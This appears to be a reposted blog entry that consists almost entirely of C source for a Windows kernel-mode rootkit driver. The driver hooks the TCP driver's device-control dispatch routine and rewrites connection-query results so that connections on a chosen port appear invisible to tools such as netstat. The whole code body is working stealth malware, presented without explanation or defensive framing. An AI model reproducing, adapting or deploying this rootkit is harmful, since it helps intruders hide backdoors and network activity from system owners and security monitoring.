• HideTcpip.c


    隐藏tcp端口,来自看雪

    ///////////////////////////////////////////////////////////////////////////////////////
    // Filename Rootkit.c
    // 
    // Author: Jamie Butler
    // Email:  james.butler@hbgary.com or butlerjr@acm.org
    //
    // Description: This is where the work gets done.
    //
    // Version: 1.0
    // 
    
    #include "ntddk.h"
    #include "tdiinfo.h"
    //#include "stdio.h"
    //#include "stdlib.h"
    
    #include "Rootkit.h"
       
    NTSTATUS DriverEntry(
                       IN PDRIVER_OBJECT  DriverObject,
                       IN PUNICODE_STRING RegistryPath
                        )
    {
        
        NTSTATUS                ntStatus;
    
        OldIrpMjDeviceControl = NULL;
    
        DriverObject->DriverUnload = RootkitUnload;
        
        ntStatus = InstallTCPDriverHook();
        if(!NT_SUCCESS(ntStatus)) 
            return ntStatus;
    
        return STATUS_SUCCESS;
    }
    
    
    NTSTATUS InstallTCPDriverHook()
    {
        NTSTATUS       ntStatus;
    //  UNICODE_STRING deviceNameUnicodeString;
    //  UNICODE_STRING deviceLinkUnicodeString;        
        UNICODE_STRING deviceTCPUnicodeString;
        WCHAR deviceTCPNameBuffer[]  = L"\Device\Tcp";
        pFile_tcp  = NULL;
        pDev_tcp   = NULL;
        pDrv_tcpip = NULL;
    
        RtlInitUnicodeString (&deviceTCPUnicodeString, deviceTCPNameBuffer);
        ntStatus = IoGetDeviceObjectPointer(&deviceTCPUnicodeString, FILE_READ_DATA, &pFile_tcp, &pDev_tcp);
        if(!NT_SUCCESS(ntStatus)) 
        {    
            DbgPrint("读取失败!");
            return ntStatus;
        }
        DbgPrint("读取成功!");
        pDrv_tcpip = pDev_tcp->DriverObject;
    
        OldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL]; 
        if (OldIrpMjDeviceControl)
            InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)HookedDeviceControl);
        
        return STATUS_SUCCESS;
    }
    
    
    NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
    {
        PIO_STACK_LOCATION      irpStack;
        ULONG                   ioTransferType;
        TDIObjectID             *inputBuffer;
        DWORD                    context;
    
        //DbgPrint("The current IRP is at %x
    ", Irp);
    
        // Get a pointer to the current location in the Irp. This is where
        // the function codes and parameters are located.
        irpStack = IoGetCurrentIrpStackLocation (Irp);
    
        switch (irpStack->MajorFunction) 
        {
            case IRP_MJ_DEVICE_CONTROL:
                if ((irpStack->MinorFunction == 0) && 
                    (irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_QUERY_INFORMATION_EX))
                {
                    ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;
                    ioTransferType &= 3;
                    if (ioTransferType == METHOD_NEITHER) // Need to know the method to find input buffer
                    {
                        inputBuffer = (TDIObjectID *) irpStack->Parameters.DeviceIoControl.Type3InputBuffer;
                        
                        // CO_TL_ENTITY is for TCP and CL_TL_ENTITY is for UDP
                        if (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY)
                        { 
                            DbgPrint("Input buffer %x
    ",inputBuffer);
                            if ((inputBuffer->toi_id == 0x101) || (inputBuffer->toi_id == 0x102) || (inputBuffer->toi_id == 0x110))
                            {
                                // Call our completion routine if IRP successful
                                irpStack->Control = 0;
                                irpStack->Control |= SL_INVOKE_ON_SUCCESS; 
    
                                // Save old completion routine if present
                                irpStack->Context = (PIO_COMPLETION_ROUTINE) ExAllocatePool(NonPagedPool, sizeof(REQINFO));
    
                                ((PREQINFO)irpStack->Context)->OldCompletion = irpStack->CompletionRoutine; 
                                ((PREQINFO)irpStack->Context)->ReqType       = inputBuffer->toi_id;
    
                                // Setup our function to be called on completion of IRP
                                irpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE)IoCompletionRoutine;
                            }
                        }
                    }
                }
            break;
            
            default:
            break;
        }
    
        return OldIrpMjDeviceControl(DeviceObject, Irp);
    }
    
    
    NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject, 
                                 IN PIRP Irp, 
                                 IN PVOID Context)
    {
        PVOID OutputBuffer;
        DWORD NumOutputBuffers;
        PIO_COMPLETION_ROUTINE p_compRoutine;
        DWORD i;
    
        // Connection status values:
        // 0 = Invisible
        // 1 = CLOSED
        // 2 = LISTENING
        // 3 = SYN_SENT
        // 4 = SYN_RECEIVED
        // 5 = ESTABLISHED
        // 6 = FIN_WAIT_1
        // 7 = FIN_WAIT_2
        // 8 = CLOSE_WAIT
        // 9 = CLOSING
        // ...
    
        OutputBuffer = Irp->UserBuffer;
        p_compRoutine = ((PREQINFO)Context)->OldCompletion;
    
        if (((PREQINFO)Context)->ReqType == 0x101)
        {
            NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO101);
            for(i = 0; i < NumOutputBuffers; i++)
            {
                // Hide all Web connections
                if (HTONS(((PCONNINFO101)OutputBuffer)[i].src_port) == 135)
                    ((PCONNINFO101)OutputBuffer)[i].status = 0;
            }
        }
        else if (((PREQINFO)Context)->ReqType == 0x102)
        {
            NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO102);
            for(i = 0; i < NumOutputBuffers; i++)
            {
                // Hide all Web connections
                if (HTONS(((PCONNINFO102)OutputBuffer)[i].src_port) == 135)
                    ((PCONNINFO102)OutputBuffer)[i].status = 0;
            }
        }
        else if (((PREQINFO)Context)->ReqType == 0x110)
        {
            NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO110);
            for(i = 0; i < NumOutputBuffers; i++)
            {
                // Hide all Web connections
                if (HTONS(((PCONNINFO110)OutputBuffer)[i].src_port) == 135)
                    ((PCONNINFO110)OutputBuffer)[i].status = 0;
            }
        }
    
        ExFreePool(Context);
    
        /*
        for(i = 0; i < NumOutputBuffers; i++)
        {
            DbgPrint("Status: %d",OutputBuffer[i].status);
            DbgPrint(" %d.%d.%d.%d:%d",OutputBuffer[i].src_addr & 0xff,OutputBuffer[i].src_addr >> 8 & 0xff, OutputBuffer[i].src_addr >> 16 & 0xff,OutputBuffer[i].src_addr >> 24,HTONS(OutputBuffer[i].src_port));
            DbgPrint(" %d.%d.%d.%d:%d
    ",OutputBuffer[i].dst_addr & 0xff,OutputBuffer[i].dst_addr >> 8 & 0xff, OutputBuffer[i].dst_addr >> 16 & 0xff,OutputBuffer[i].dst_addr >> 24,HTONS(OutputBuffer[i].dst_port));
        }*/
    
        if ((Irp->StackCount > (ULONG)1) && (p_compRoutine != NULL))
        {
            return (p_compRoutine)(DeviceObject, Irp, NULL);
        }
        else
        {
            return Irp->IoStatus.Status;
        }
    }
    
    
    NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
    {
        if (OldIrpMjDeviceControl)
            InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)OldIrpMjDeviceControl);    
        if (pFile_tcp != NULL)
            ObDereferenceObject(pFile_tcp);
        pFile_tcp = NULL;
    
        return STATUS_SUCCESS;
    }
  • 相关阅读:
    归并之将两个有序数组合并(已測试)
    Embedded Android 协同翻译
    IOS中公布应用程序,进度条一直不走怎么处理
    《textanalytics》课程简单总结(2):topic mining
    编程小错误备忘录
    观察者模式
    scrapy递归抓取网页数据
    leetCode 95.Unique Binary Search Trees II (唯一二叉搜索树) 解题思路和方法
    spring4.0.0的配置和使用
    ios面试基础
  • 原文地址:https://www.cnblogs.com/passedbylove/p/11223794.html
Copyright © 2020-2023  润新知